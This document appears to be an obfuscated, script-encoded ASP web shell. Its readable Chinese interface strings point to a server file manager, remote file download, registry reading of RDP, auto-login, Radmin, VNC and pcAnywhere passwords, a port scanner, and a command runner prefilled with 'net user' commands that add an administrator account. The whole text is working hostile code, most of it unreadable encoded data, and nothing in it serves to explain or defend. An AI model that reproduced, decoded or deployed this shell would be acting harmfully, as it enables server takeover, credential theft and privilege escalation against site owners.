WK2U{?bx0K2 '2 ZGN`HnS?YMck*~r(%KWk#L\8Z.J6)H+XO)UkUWK2xxJ0O`Ur 0GAxBS+ `Urx6W3x*O+b@#@&2 [PwEx1OrW @#@&Zsldd,s(s=[ksPor^+?r"~ok^nUYCMY=nDb\mO+,?;4,ZsCk/{&UkDkl^r"+=sbVn?r"'T)wrV?OCMY'TlAx[PU;()K!4^km,0!UmDkGx,?C-b/vo#@#@&P,[r:,K2)jl-nz/xYM;+=kW~DDkhcw#xJr~KD~wk^+?DlMO'ZPOtx~nXkY,WE mYbGU@#@&P,/nY~P2'/DCYr8%mYcjKYcvBT*#l:&cHW9+{f):& KHwnx8)K2 ra+x=PqRaWkkOkGU{srVjYmDOl:FR^GaXOW,P2~obV?k.+=P&c?C\KGobV+,o~y)K2 /VK/)d+O~:&xxKOtbxLlUl\n)k'Wl^d)n N,0E mDrW )3x9P/sm//=@#@&@#@&s!U^YbW PoEUcUtr?mUr(LdOM#)j4b?Cx}8N/OM'"+w^l1n`Utr?mx68N/YMSJ-J~rEEJ*)wW.Pj4b?Cx&xF,KG~d+xcj4kjl 6(LdDD*)q6PtrNv?4kUlU6(L/D.~UtkUCUqBF*@!@*JZE:tnx=jtb?CUg+hjOM'\k9cUtrUl r4N/D.~Utr?mx(S8#[U4kUlxgnA?DD=2s/nlUtr?mU1hjOM'\8/MSW[U4b?C 1h?DD=3x9P(0=1naD)s!UP{P?4rjl 1hjY.lAx[Pw;x1YrG @#@&/sm/dPd$w)9b:,Zs=nMr\mYnPUE8~;Vlkd{&xkDrCVby)j2P~;sxZMnlD+68N+mOcUWO`ZSZ#b=2 NPUE(lnMk-lD+~j!4P;slk/{:n.:bxmYn)jnDP/s{HWDtrUT)2U[,?;4@#@&wEU1YbWx,?4GhGDr\Dcb@#@&sK.PAlm4~9Pbx,ZoR9.b\n/@#@&I"?E@!DD@*@!O9P4+bL4YxE ZB@*@!l,4D0xBNl-CkmDb2Y=?tKAoW^NDcJEELf fMr\SnOD+D'E=-wJrbE@*→本地磁盘~vJLfRGDb-+d+OYD'E=#@!JC@*@!zY9@*@!zDD@*J~@#@&H6O@#@&3x9Po; mYrG @#@&s!U1YrKx,?tKh8ok^+cnmY4b=@#@&UnY,srd9xZwRV+OsGs9+.`hCY4#@#@&b'!@#@&UqxJ@!Om4sPSkNDt{vFZ!YB,4G.9+D{v!EPmss/al1kUoxvZB~msVal[[bxoxv+B@*@!D.@*J@#@&sKDPAl14PwPrx,s6JGR/!80KVN.d@#@&?&'jq'E@!Y[P4nkTtOx8!PAr9Y4'8{uPC^kTx'1+ O+M@*@!Nb\~dDXVxB(WD9n.)8wXPdWsr9PE[~GD9+./KVW.'rB@*J@#@&UqxUqLJ@!mP4.+6'vLm\Cd1DkaO)UtWSoGV9+M`EJE'"+KlD4`hlO4LJ-E'wRHlsn*[ErJ*BPDkDs+{JE进入Jr@*@!WKxY,Wl1+'EArxTNbxL/v~kk"+{vvE@*T@!J0WUO@*@!8D@*ELs gls+[r@!JC@*rP@#@&Uqxj&[J@!8D@*@!4@*,@!z(@*@!l~t.n6'vLm-lkm.raY)o;^VoWMhvJEr["+nmY4cnmY4[r-E'wR1mh+*[JrESJrZKwzsGs9+.JrbBKx^sbm3xvM+OEMU,XnkW0`#EP1slk/xBm:v~DkY^n'E复制B@*;G2X@!zm@*~J@#@&Uqx?&'J@!l~4M+0xvNl-lk^Mk2D)wEV^sK.:vJEJLIn2^lmcnmYtLEwJLsc1C:nSr-E~rw-r#'ErJ~EEG+ssKs9+.rJ*BW m^rm0'vDY;. PXdW0`#E~^Vm/k'vlhv,YrY^n'E删除B@*9V@!&C@*J@#@&U({?(LJ,@!l,tMn0{B%l7ld^MkwDls!VVwG.:vJrJ'InKmY4`hCY4[Ewr[s Hm:n#LErJSrJtW\sKsNDEJ*BGU1Vk1V'ED+D;.x,X/G3cbEP^Vmd/{BChEPYrO^+xB移动E@*tW-@!Jl@*r@#@&jq{?([rP@!C,tDW'ELl7CdmMkaYls;s^sGDscJrJ']nlO4vnCY4'r-ELsc1ls+*'JrJSJrfGA sk^nJr#BKU^Vbm0'vDnO!DUPHn/K3cbEPmsCk/xBmhEPObY^+'E下载B@*9WSx@!zm@*@!8@*T@!J8@*@!zNb-@*@!JY9@*E@#@&r{kQF@#@&q6Pr~sWN~X,'~!,O4+U,?&'?&[r@!zDD@*@!DD@*E@#@&1aY@#@&?&xjqLJ@!zOD@*@!DD@*@!D[P4+rL4Y'+@*@!zON@*@!JY.@*@!JYl(V@*J@#@&]IUPj(=?q{EJ=k'Z@#@&?&'r@!Ol8sPAk9Ot{BqTZ]B~8KD[+MxE!v,mVVkwm^k oxBZB~^VVaCN9kxTxvvE@*@!Y.@*E@#@&sGD,3l1t~J,kx~oKV[R6r^+d@#@&Uq'UqLE@!DN~tkL4D'B2TB@*@!Nb-~/DX^+xB8GMNnD=qwXPdG^kN~ELAGD9nMZG^WM[JE@*@!CP4Dn0{B%C7l/1.kaY)w;sVwWM:cJEELInnmOtvnCO4[JwELS 1mh#'rJr~JrfKAxwks+rJbIEPYbOV'B下载E@*@!0KxDPWl^n{BAk LNbxLdEP/r"'v*E@*y@!&6W Y@*r[d 1m:n[r@!&C@*P@!(@*$@!z4@*~E@#@&?&'jq'E@!l~tMn0{B%C7l/^.bwO)w;^VoKDs`JrJL]+hlOtvnCO4[J'E[dR1mhn#LJrJSJE39kOsbs+rJbv,mVCdk'vlsv,YrDV'B编辑E@*A[kD@!&l@*PE@#@&?q{jqLJ@!m~4D0{B%l-Ckm.kaO)wEsswWDhcrJE["nhlO4`hlY4[rwJLS 1m:nbLJJrSJrf+^orVJr#vWU^^k^3{vDY;. PXndK3c#E~1VCk/{BlsB,OkDVn'E删除B@*9V@!JC@*,J@#@&jr'UkLJ@!l~~4Dn0{va[av~1Vldd{BC:E~@*@!WKxDPmKVK.'(V;+,@*权限@!&6WxD@*@!Jl@*r@#@&fb:,2[kO6}|@#@&A[kDr6F{F@#@&39kOr}#{V zYDDk(EDn/@#@&(0,2[rDrrj~@*{PFy0~K4+ @#@&2[rDr6.,xPANrO}r.~R,F+%@#@&Ax[,q6@#@&&0,3NbY6rjP@*x,vc,Ptx@#@&3[kDr}.~'~39kOr}#P P*@#@&2U[,qW@#@&(6P39kDrrjP@*xP2 ~K4+U@#@&2NbOr}.P{~3NbY}r#PR~2 @#@&AUN,qW@#@&q0~39kOr}#,@*x,F+PK4+ @#@&ANrY}r#~{P29rY}r.,R~F+@#@&2UN~(6)(0,3NbY66jP@*x~RPPtU@#@&39kDrrjP{~29kOr}.~R,%@#@&3x9Pq6@#@&q6PANrY66jP@*',*P:tnU@#@&2[rDr6.,x,2[bY}r.,O,*)ANrY}rFxZ@#@&AUN,q0@#@&(0,29kOr6#,@*xPy~K4+U@#@&2NrO}r#P{~ANrDr}.P Pyl29kOr}|xT@#@&2 [P&0@#@&(WPANbY6r#~@*'~F,Ptx@#@&ANkO6}.~',39kO}rjPO,F=3NbY6rn'T@#@&2x9~q6@#@&bW~29kDr6|xT,Y4+ @#@&kkxdb[J@!WKxOP6C1+xEh4NbxTdB,/ry'vqEPmKsWM'D[@*6@!z6WUY@*E@#@&nVkn@#@&/rxkk[E@!6WUY,^KVGM'M+N,@*√@!&0KxO@*r@#@&n NPbW@#@&?q{j([r@!mP4DnW{B%l7C/1Dr2D)s;s^sGDscrJELInlDtvKlDt'J'J'Jc1lsn#LJJrSEJ;WaXoksnrJbB,^Vm/dxEl:v~DkOVxE复制B@*;WaX@!Jl@*~J@#@&jq{?('r@!l,4D0'E%C\m/1DrwOlwEsVwGDs`EEr[InKmY4`hCDt'r-r[Sc1mh+*[EJr~EEtW\ok^+JrbvP1Vm/d'vCsB~YbOV'v移动v@*HW-n@!zC@*,@!(@*D@!z(@*P Pr@#@&Uqx?&[^s o`d /by+JqT W#LJF@!8.@*@!8@*r@#@&Uqxj&[S PHwn[r@!J4@*,@!b@*P Pr@#@&Uqx?&[J GlYJlkYHK[r0b+9[E@!&r@*@!&Nb-@*@!zO[@*J@#@&r{kQF@#@&&0~bPsWN, ,xPZPOtx~j&'?&'J@!zYM@*@!YM@*r@#@&1naD@#@&P"]?,?('r@!zO.@*@!&Ym8^+@*r@#@&?+DPw6SG'HWDtrUT@#@&AUN,0E ^OkKx=@#@&s;U1YrW ~fVor^+`KCDtb)AaZ;D+,?k 0K3xvJ4+,K4bmY`hO/b/2XsnsbscP/qWU#Y4nmnPbVnoY+s GZo=M@*D+n z1!@!成功删除U,tLCYLn~U文件M@*@!8M@*@!(.@*@!4D@*On+ @!1'=?(=#j.m0$l&[xjUqV|j&?~I"|&0[,2 J~hWkb)Ax[PwEU^DkW ls!xmDrGx,29kOsrs`KlD4#=)(W,I+5;/O`r)1YrKxyJ#{JhG/DJ~K4+UlU+Y,P';sR;.nlD+:+aYor^+cnmOt*)P qDkOndkU+,];;/DR0KDscJ1WUYxOE*)Kc^VK/+=jnY,K{xGY4r ol?&xJ@!mnUD+D@*@!(D@*@!(.@*@!8M@*文件保存成功!@!zmxDnD@*Jl?&'j(LAl1VjMV)"]jPUq=I]?~Er[^WazEMV'Er)IndaWU/ Ax[=2 NP&0=(0,nCY4@!@*ErPK4nx=?+D~P';scW2+UO6O0bs+vnCO4~PqS,sCVkn*)PXY{CKtSAUmKNn`:R.nmNl^s#,)Kc^sWk+=?nY~P{1GY4rxT)3sk+)KCDtx?dkkG `rsW^N.nmY4J*[Ew +h6rVRlk2E):6D'E新建文件Jl3 N~q6l?&'j(LJ@!oGM:~l1ObWU{Br[j"SLEgzmOkKx+xhW/DvPs+Y4G['EwK/OB~Um:n'E3NbYoGM:B@*E=?('U(LJ@!bxaEY,xmh+{B)mDkGUEP\msE'BA[rYwk^+vPPza+xB4rN9+Uv@*J)j({?([r@!bx2!Y,xls+{vsglh+EP-C^E+{vJLnlD4'JEPkYzVnxEhrND4)8!TYE@*@!8.@*Jl?&xUq'r@!D+6DlMnl,xC:'v/KxYUYEP/Dzs+{BSk[Y4l8!T]p4+bo4O=c*Tv@*J'KXOLJ@!JY6YmDC@*@!4.@*r)j({?qLE@!4D@*@!rUw!Y,xC:nxEoG4m^3EPOza+'v8!YOW v,\C^E'B返回EPKUm^k^3{B4rkYWMzR(lm0cbiE@*Lx8/2ILx8/aI[ 4d2p@!kU2!Y~xmh'vM+k+YEPDzw'vD/nOEP\msE'B重置E@*'x(/ai'x8dai'x(dwp@!rUaEY~Um:n'Ed!4hbYEPYHwxBkE8:bYv~7lV!n'E保存B@*@!&WWM:@*JlI]j,?()@#@&2 N~o!xmOrKxls!U1YrKx,ZWaXwrV`KlDtblA6+;;YP?bUWWAxvJkUkk?u4~mO`hkO2^P?~xDtKl*|xP4U,@*U*@!vqY4nCN,lUb,!#4clD`nDdr/A6^+oko ,Z(0#cFDtKC*~`TO4nC+,r^XoKwcZZw##@*UDUY1+@!&功!制成?复#[vTY4nl?'文件.@*@!4M@*@!4.@*@!4.@*Dn+ @!^x??q|iMmVAm(L'jUq^=?&?,]I,=(09P3Ur~nKd#=2x9~oE mDkGxlo!x^YbGx,HG-sksnvnCY4b=2aZ!Y+,?bU0K2U`rukk?#Y4SU-kYvKC',?aVKlO4,==P:4+8#@!@*?nlO4vPCx9~4`T*#k`nmYAakkY sbVn(6PZwU=hlY4c4`Z#B+~nCO7+ok^/scHGq*=+UOD功!@!z1'?移动成Y4v!*件U[hl@!8D@*文@*@!4M@*.@*@!4D1nxD+?&x=@!@*U#[$l^VUqx?&iD^=]]UP?(~#2UN,(6JSh/K#)Ax9~s!x^YbWUlwEx1OkKxPGnssKV9+.`KCDtb)Aa+;EOn,?kUWK2U`r4PP4#mY`hYkr/A6nD^NoGwRP;(0 =Y4KCD,NWs+onD+sRG/s#D@*O+x&^!@!成功删除[=Y4KmU'目录M@*@!4D@*@!(.@*@!4.@*D+nU@!m'?jq?=jM^VAmqL'j?(s#?(?,]I#qW[,2xEShWd#=3 N~wE mYbW ls!x^YbWU~;WwHoW^N+McKlDt*)36n/!YnPUrx6W3UvJu=k-UktBCD`KbYaVPUP{Othlb=xP4?P@*?b@!vFY4KCN,l #~!b4vlO`hO/b/3aDV[oKs P;(6=c8Y4nl*~vTY4nCD,NnG^XsK2R;Zs*|@*UD Y^+@!&功!制成?复#'`ZOthl='目录M@*@!8.@*@!8D@*@!(D@*D+x@!1'?jq#j.m0AC(L'?U(V#?qU~]I#q6N~2UEBnG/*l2 N~o!xmOrKxls!U1YrKx,HW7+wGV9+.`hlO4*)2XnZ!Y+,jrx6WAxcJk=-u=u4SlD`KrDwV~j,'OthC*=n K4UP@*U*@!`8Y4nmN~C #PZbtvlYvKO/b/A6nDs[wWoR,/q6=cqDtnCbB`TY4KmD~9+KV+wW7 H;sb=@*Un. Ym@!z功!动成?移#[vTOthl?[目录.@*@!8M@*@!4M@*@!(D@*O+x@!^{Ujq#iMmV~l&['U?&s=UqjP"I|(6NPAUJBnWkbl2 N,s;x^ObWU)w;x1YrG P1nAwWsN.vnCDt*)2X+;;YPjk 0G3 `JUK4UP@*=4@!mY,nUN~C4#CYvKYkkd3X+Ds[wWoR,/KY~gq6=Y4nm.P9+GVsCOM+R;/s#D@*DnnxJm!@!成功新建[=Y4KmU'目录D@*@!4M@*@!8M@*@!8.@*Yn+ @!1'=Uq?=jMm0$l&[x?Uqs|Uq?,]I#q09~3xr~hWd#l3 N~s!UmDkGU=2x[~;VC/klkE8,oYKDsrxmV(x6Wcb=26/ED+PUrU0K2 `EPHnXYn/!h+MW.~"rx~3M=4+^s?k2DRUUUmM%+1YclD+68MRZMn?D\dpP{PU+OPAb#+.:hG+H~~OhWDOFskUl^S,YnMYhlY4l^KWM+.:bx9rsPYMO= nlkdGSKob~~l;ODF+HLk jd;DWSGO4~~lTr nC!YKSWGks~ln+z= nCdkWSKLkBPl!O.xm:kUjdnDWJWTz~,l;8^+|nr 2UlDGdWL~,lEAxm8VdWLk /);DWfbhPbhWM[|K1w'UwI9K YrW dk ?OC7+Dw ^Pj+M.skUmW^-KZKUYMVj+D-GUDDWMnxDZH'/;DU5UK3CFJt-4P{~UMYKCDxlsKKYnDsr#:8D?WDD1!~',UKDD|nz lVhGYD:b|KWMYn:rxCsLPO+MKlDt~shWDO.skUlm[vYn"+TI+,hkpRKDOP{Yn.sn+Hb=@*@!W^@*录@!tMz口及自动登终端服务端"IjP==#PPtUP@!@*~T!:4n.AD.Rg=,r.,Y,'P?DsKWMqWPD+~|@!4DJ@*受到限制R限是否已经,请检查权服务端口~法得到终端I"j=无U#PAVd+|=@!4.zMOPLPn.snW=~LPO务端口),当前终端服]"?~?@*?=2 N,(0#WLW -w bxVMdkKx+ O#+'Z!D.hd~gK k [WkWWO'Hk^.K)IAw'?6wK;Cqg2zJ{tbe{dr/~?C|ACY4P'KLrxhl!YGS=| SGoKGb9:r~?bEOFX~' C(VnKobx2mEDGS U|Dglhn^Yjknf0l!z~',Uk+.|nGTkUjm;YKS=|khW.[^YKlk90C!X,'P?lkd|WLk nC;DWS?|4^+|rU2 lDWJWL~LPCE KlDtGJKok[cmEO+T]lAk(cIVP{~xAxC4KSGLbk/z;YH#=,x~!,xm4s+GLbx3b!OWdqW~b/K4n =启@!4M&录功能未开系统自动登"Ij,U@*U=AVkn=M|nX*kUik+YKJWTP[,C;xhlDtGSGLbNcl!O+TInCS/( ]s+~',dDUmWTkx`l!OWd==@!(D@*hP[,d+MxlKLrx`l!YGS~=,[~系统帐户)自动登录的"]?,U=|k|+zbbxKlkOKSGTPLPl!xhCY4WJWTk[cmEYLIlhkp IMN,'~lddSWGobUnmEOGd=D~P4+(0,3Mx|ADMRZ^+m.=wls/I]j,UU#3x9Pq6|=@!(D@*D[P'~m/dhKGobxKC!YWJ~?P'P帐户密码=自动登录的]"?~?U#2x9P&W=@!zGV@*I]j,UUrSnkW#=3UN,?!4l/;8,Inl9]2V`b@#@&IIj~r@!WWMh,:nDtKN'aWkO@*r@#@&I"?~~r注册表键值读取@!w@*EP@#@&I"j~J@!k w;Y~OHwn'4rN9+U~7lV;n{Inl9]o~ ls+'Dt)mD@*E@#@&I]j,J@!D.@*@!YN,^GVkwmxx @*' 4dwpE@#@&I]j,J@!dn^+^Y,G Z4mxT+'EY4r/c0GDsRO4nlD4R7lV!nxY4kkR-ls;iv@*r@#@&"Ij~r@!W2ObWUP7C^En{BE@*选择自带的键值@!JWaOkKx@*J@#@&]]UPJ@!GwDkW ~-l^E'vCFJt-j5UP2t-/;MD+UO;WUYMG^?nD-;WxDDKs-;Whw!Yn.gl:wZK:w!OnDgls+wZGhaEO+MHls+v@*;W:2;D+.1mh@!&KwDkW @*r@#@&"IjJ@!W2ObWx,-l^E+{EECnSt-j5jPAHwZ!.DxO/KxY.G^?nY'jD-bm/-:marw'Srx0lLn'Ak [Jr@*网卡列表@!JG2YbW @*E@#@&]"?E@!K2YbWU~7lV;n{JECnJt-jI?:2H'Iz[:bxw\yRTwU+D7nD'nlMCh+D+M/wnC.m:nY.Jr@*]C9:kU密码@!JW2YbG @*E@#@&"I?r@!K2YbWUP7ls;'Jru|dH-UejKAH'I)Nhr -- cT-U+.-D-KCMlh+DnM/whWMYJr@*"CNskU端口@!JW2ObWx@*E@#@&IIUE@!WaYbWUP-C^En'rECnZiwUW0OAmDn-}]d- bxj1Z2-hC/khGD9JE@*j1Z2密码@!zKwYbGU@*r@#@&I]?E@!KwOkKUP7ls;'JEunZi-UG6YAmD-r"S' k .HZ2-KGMY1!h4DJr@*#1;&端口@!zGwOrKx@*J@#@&I"?E@!KwYrG P-l^;'ErCnSH'?}oKqb]2'InC^.1;wbx.g/*-hlk/AW.[rJ@*.g/c密码@!zG2DkWU@*r@#@&I"jr@!GaYbWx,\msE'EJ_|J\'?rwPzI2']nl^.gZwrUj1/c'KWMYH;s4+.Er@*#1;*端口@!zGaYbWx@*J@#@&I"?E@!KwOrKxP7CV!+'rEu|dH'?e?P3t-/EM.+ Y/G YDGsU+O-;G Y.KV'K+M:bUl^Pj+M\n.'k jYmYkKUd-"fhOPm2whW.Yg;:(+.Er@*&f0O端口@!&WaObWU@*J@#@&I"?r@!WaYrW P-C^E+{EJ_|StwjrwKqb]2wjH:CxDnm'w^) Xh4nM+wZ!.M+UD.D/bW w?H/O+s-P/hqnGCYmnWMOEJ@*n1bUX 数据端口@!JW2YbGx@*J@#@&"I?E@!KwOkKU,\C^E'JrCnJH'?6s:)]A-?Hhl Y+1w2mzxHh4+.n'Z;DMnxD.n.kkWUwUXdYh'K/hqh?YmY!dnKDOJr@*K^zxXq状态端口@!zKwYbGU@*r@#@&I]?~E@!W2YbGx,\Cs!+'vun2e{d6;bJ|HzZC&1Aw?I?P2t-/G YDKs?Y!Zqw?D7k^+dw:m2kaw2 l8s?+^;MkOXwr^YnM/E@*Y1wJrw过滤8@!&WaYrG @*J@#@&I"?Pr@!GwDkKx~\Cs!+xB_F2I{J6;bSm\zZuqg3'?eUKAH-;W ODKVj+D!T+'?+M-k1+/'P^wbw'2Ul8s?nm!.kDXor^Y+.dE@*Oma&bw过滤+@!zKwYbW @*J@#@&]IUPE@!KwYbGx,\l^;n'ECn2e{J6;bJ{t)Z_qH3'?5jPAHwZ!.M+UDZKxYMW^j+D-j+M\r^/-:^wbw-AUC4^+U+^E.rDXok^O+M/v@*Dmw&ra过滤&@!zK2DkG @*r@#@&"IU~J@!W2YbWU~7lV!n'EC|AemS}ZzSmH)/_qH2'jrwK )"2-\r1DG/KWD-j1tNE^k LbT+UY'SGLhlY4v@*Umt[;VPdWL@!&GaYrW @*J@#@&]]UPJ@!GaYrW ~7ls!+{BCnStw?I?P2t-/;MD+ OZKxYMGs?Y'?nD-r1+d-U4lM+[)1m+dd'nCDmhYnM/'skM+SCV^nGVbmzwUYl [lMNnMGWk^+'MsW8C^VzranxhW.Ok-SrdD-f&R1=K/hB@*防火开放@!zKwDrW @*E@#@&I]j,J@!K2YbWx,-CV!+{Bu|J\'?e?:3H'ZGUDDWsjYT!8wU+.7k1+/'K12ka-KlMlhnD+Dkwq Y+MWCm/' 0b*lF+% 02O,R*~!ZR)wsfO8fW%9;*l2Ay2)wjGn)V^WAn9nWMO/E@*允许开放的jGK端口@!zKwDkGx@*E@#@&]IU~J@!W2ObWx~-mV;+{v_|Jt-U5?:2twZKxODKVjnD!!8w?D\b^n/'K1wrwwKmDC:O+M/w( Y+.Wmmn/'`Rb*+*8 % %A1, c$!;O)ow&O8fcRfZlX3Ay2)-PZK)^VGh[nKDOdE@*允许开放的K/K端口@!zGwDrKx@*r@#@&IIUPr@!zk+s+1Y@*@!(DPJ@*J@#@&I"j~JLx(/2i@!r w;Y,Uls+xO4+nCO4P-l^;'vEPkky'RT@*r@#@&I"?~E@!kxa;Y,YXanx4!YDWUP-C^En'E读取键值vPKx^sbm3xvDtr/cWKDhc/!4:bYvbB@*J@#@&"Ij~r@!z6GDs@*@!4.&@*r@#@&kWP]n$En/DcJDtnKmYtEb@!@*EJ,O4+U@#@&}xPADMGD,In/!:n~g+6D@#@&U+Y,Ad(,',?nD-nMR/DCYr8%mYcEq?^Db2DRj4+^VJ*@#@&OtnCY4']n$E+kO`rYtKCY4J*@#@&Y4nzD.lHxhk( ]oInC9`OtKmY4*@#@&q0,qk)DMlz`Dtn)MDlHbP:t+ @#@&sKD,kx!~PKPiAK;x9`O4bD.CH#@#@&"]UPE@!Vb@*J,[,Otb.DmXcr*@#@&gn6D@#@&Asd+@#@&"IjPE@!^k@*J,'PDtn)MDlz@#@&2UN,(6@#@&x9Pk6@#@&nx9PdE(@#@&o!xmDrW PNKAUVKl9/c#@#@&"xIq'J@!mnUD+D@*@!(D@*@!6GM:~s+DtW9'aG/D@*直接下载@!4M@*@!8M@*J@#@&Iq'Iq'E远程文件)@!k w;Y~Um:n'D4+`Ds~7lV;n{B4YD2=z&EPkky'RT@*@!4.z@*J@#@&"'" [r本地路径)@!bU2EDP lh+xO4+KlD4P7ls;'JEE,[~CDh^2U1W9+`U+M-+MR\lanCO4`JcE#*P[,EEJ,/byn'X0@*PE@#@&]{I 'r@!kU2!Y~YH2'^4+134K6,Uls+xW7+. MkY~\mVEx+P1tmV+[@*存在覆盖,@!rxa;Y,Yz2'/;8skOP7C^En{B,下载PB@*J@#@&Iq']LJ@!r wED~YHw+{4rN9+ P-ls;'[WSUsMWhiMVPUCs+xY4nzmO@*J@#@&Iq'" [r@!&0KDh@*@!zmUYD@*r@#@&I/aWU/n qDrY~Iq@#@&(6Pkd94;otG9+xwl^/+,K4nx@#@&6x,2..KDP"n/!:+,Hn6D@#@&2UN~(6@#@&fbhP_YO2BYtniMVSY4nhlO4~kYDlsSoYWk^+HCs+~K-+MDbOn@#@&Y4+iDsx"+5EdYvJO4jDsE*@#@&Y4nhlO4'"+;!+kO`rY4+hlO4r#@#@&G\DMrO+{I;;+dOvJG\.MkOnr#@#@&jY~/D.lh{?D\Dc/DlO+}4%n1Y`rCNr[+LEGN(RkYE[n'rDnlsE#@#@&jnDPCOOa'j+M-D ;DlYr(%+1YcJt?p\d Ro\S_KKhEb@#@&q6PG\n.qDrY@!@*yPP4x@#@&G7+.MrD+x8@#@&2x9P&W@#@&COYaR62xPr!2:J~,O4+`D^~~sCsk+@#@&_OYaRjn N`b@#@&qWP_ODw "+mNXUYmO+@!@**P:tnU,@#@&AUN,q0i@#@&bY4PdY.nm:@#@&cPXa+xq@#@&R\G9+x&@#@&cr2x@#@&RqDbO+,COYaR]nkwW d+~WNH@#@&RhWkkOkGU{!@#@&cjl7+PGwkVn~DtnnmO4~~K\DMkDn@#@&qWPAD. gE:(nD{&!Z*~K4+ @#@&2..cZs+m.@#@&onO6kVnHm:n'U2^kOvY4+jMVB~JJJb``AG; N`U2VbY`D4njMVBPEzEb*#@#@&&WPT+OWbV+HCs+xJr~:tn @#@&o+D0bs+glh+{Jq+7tRDaYr@#@&AU[P&0@#@&OtnKmY4'D4+hlO4,[PEwrP'PTnD0r^+gl:@#@& ?m\nKKsrsPY4nnmYtB~G\DqDrYn@#@&2UN,(0@#@& /^W/n@#@&2UN, bY4@#@&1t3ADMc2MDbdi@#@&jYP_OYa'1KO4k o@#@&j+O~UY.+mh'gWO4bxo@#@&&0~kk94;THKN+{sms/PPtx@#@&}xPA.DKDP"ndEs+,1n6O@#@&2UN,(0@#@&3U9Ps;U1YrW @#@&s; m:kW Pt\fv#@#@&UqxE@!4D@*@!Ym4V~Ak9Y4'EJqTZ]EJ@*@!YMP^sm//xOM@*@!0K.sPUm:'0KDs~:Y4W9'2GkYPm^YbWx{EEJr@*;H9命令@!rUaEOPDzw'OnXYPUCs+xHt9,/r.+{&*,\msE'vxY~;k+D,0!k+m,0T/m,zCN[~LPU+D~VKmCsTDW;2,l[:bUb/OMlDWDkPRT/m~zmN[v@*P@!bUw!YPDz2+{Y6OPUCs+xj,-l^Enxs//5s用户名@*P@!k 2!Y~DXa+'D+XOP lh+{n~-mVEx:k/;^密码@*~@!bxaEOPOza+x/!8:bY~-mVEnx执行@*@!&0K.s@*@!JYM@*@!JYm8V@*E)"2dKKx/A hMkYA~jq=?&'EJl(6PODbh`"25;A/Y WKDh`r\tfE*#@!@*JrP,OtAxlnm?dAKDN{~YMk:v]3;!2kY 0G.s`Enrb#=k[xDDkhc"25EAdDRWKDs`J`J*b)k+OPmNG/Kxx{j2M\2M /DlD+64%n1YcJz9rGA /Kxxn^DkGxrb=l[KZKxxcranx,JKDK\r[D'U}S}S2G$ Fpnm?dhG.9'E[hC?khG.9[JIik2.P&9{J'bN=/YMp!nDHPxPr+an1P:mdYDR98GRXw|mhNd4VsPEEPLP]3$E2dOc0GDscrH\GJ*P[,JEE)k+OPM+^]A/E^OP{Pl9G/W xc2a+^;D+c/D.p!+.z*)qW~grPPMn1I3kE^YRArw~Y42U)GW~ 4kV~1}KPMn^IA/!VOR36w)dYM]2kEsO,'PdOMI3/!sDP',m4D`8&*~[,Dnm"2d;^Y`Zb)M+m"3dE^YcHG\nH6O)dGWa)3U9PkWlk+OPMn1I3kE^YP{PgGY4kUo=/O."2/!sY,'P"32VzmA`dY.]A/;VDSJ,JSELx4d2pJb)kOMI3kE^YP{P"3w^b^2v/O."2/!sYBJ@!rSE[^YpJb)dOMI3/!sY,'~]AwV)^A`dYM]A/;^YBJ@*r~r'oDiE#=/O."2/!sY,'P"32VzmA`dY.]A/;VDSm4Dcq2#~E@!(D@*J*lAx[,k6)/Y,CNKZGx Px~gWY4rxT)IAdKW /AR DrOAP]2$;2kY WKD:cEtH9J*~LPE@!4M@*JLPkOD"2dE^Y@#@&MD/,EJLmWaz;D^[rJ@#@&nU9PoE ^YbWUlwEx^ObWUPm[skUm4v#@#@&IdwKxd+c2a2bD+kx!@#@&W ~nDMWMP.+d;s+~xaY@#@&jnDPYHxk+.\.cm.lD+r(L^YvJ /1Dr2DR1OhKD3rb@#@&U+DPG4%!MW;w{!+Dr8%mYcEqkU1:lJzELYgRZK:a;YDHls+'EJbNsrxb/YMCOWM/Bo.W;2r#@#@&wGD,2C^4Pl[hbx~k ~K4%VDKEwcHh4Dd@#@&I]j,lNsrxc1lsn'J@!4M@*E@#@&H6O@#@&r0,+..,YtnU@#@&]IU~r他奶奶的不行啊) kmMkwDRgnYSW.3r@#@&n NPbW@#@&2x9~oE mDkGx@#@&ku2AJF,'~ENhYE@#@&s;x1ObWU,2 mDHwDcl1Nb@#@&sG.,kP{~F,KW,Jnxvl1NbPdOw~F@#@&m{:r[vlm[Sb~q#@#@&b0~1'r※JPDtU@#@&Nx:bNcC1N~bS *@#@&bxr_8@#@&+xDn2^l^+v[~r※JSEr#@#@&8(mx4(^L:r9`kCA2dq~1kUYv+bS8#@#@&nVk+@#@&88m{4(m'm@#@&x[PbW@#@&xnaD@#@&3U1DzwDx(4^@#@&xN,s!UmDkGx@#@&d;(P?1CxhWDDcb)A6Z;Yn~UkU0K3xvJ{Z!!~x,G{:G!YraY:kDc?1.?D-+#U~O4+Y?b'?`UaG.RwWM:5EndDkWPMnx#%1SW&&fS2&**BqWFfO~W~F2*BT~8FT~y*S0yF~yfkkY'?KGDDSO*0U|n^/n=scUaWO wWDn5!+dkkO{DKKDDSDDU*|+ N~k6=bx?UPv=kaURwG.:$E/OkW~M+OtU=yG Tcqnx=8! F?|Vd=vUkaUcoWM:5E/O(h'Db=xN,rW=G#@!z2荐使用Z\慢S个人推B速度比较描多个端口器`如果扫@*端口扫描4M@*@!aI]j?@!@*=|MEniEsNxDNb/l(4srYc:qRkExv6WD!8:bYB,GU?bW 'vB~C1YvwKdYDtG[{FB~hBWWMh lh'6WDsP"]??@!@*U#[U8kwx,(n=w@*U^CI"??@!IU|"'vv?vPkk='&n[s;'vwE~7lr9'EkAK6E~B:+aY^ldd{6YE~m'BDnvPDXa+xBr2DPUls@!k w;]"?U~TE@*==MO,Sr(D@*nW"IU=@!kYlU#kdOLUnK.Yd+'E='P7l^ExBTEPdk.nY~Wav{BKna1VC/knXYv,w'BDYE~YH'vwKD~Um:+bUw!YI"j=@!E@*?=8D@*@!(I]??@!D@*U|U,B@*=v,/^lms!+xK:EP\E4!OY^ld/{kOv,mBk;4sYXanx:bYEPxBd;(PUlsnk w;O"I?=@!#FqB@*=!+xEFEP\mVEdmmxvPbNxr9N+ 2+{Bt v~YH'E/^l~Um:nk 2EDI]j?@!=WGM:@*za@*@!z]"??@!U#@*,=U,x=#,@!c=kmlcoWM:;!ndY&0,DnK4n =qP{~YDkhnMk:n.#@*@!tM@*(@*@!(D报告=@!z@!4@*扫描]IU`=U*==bBU~?2WMYsK.h`!+kY 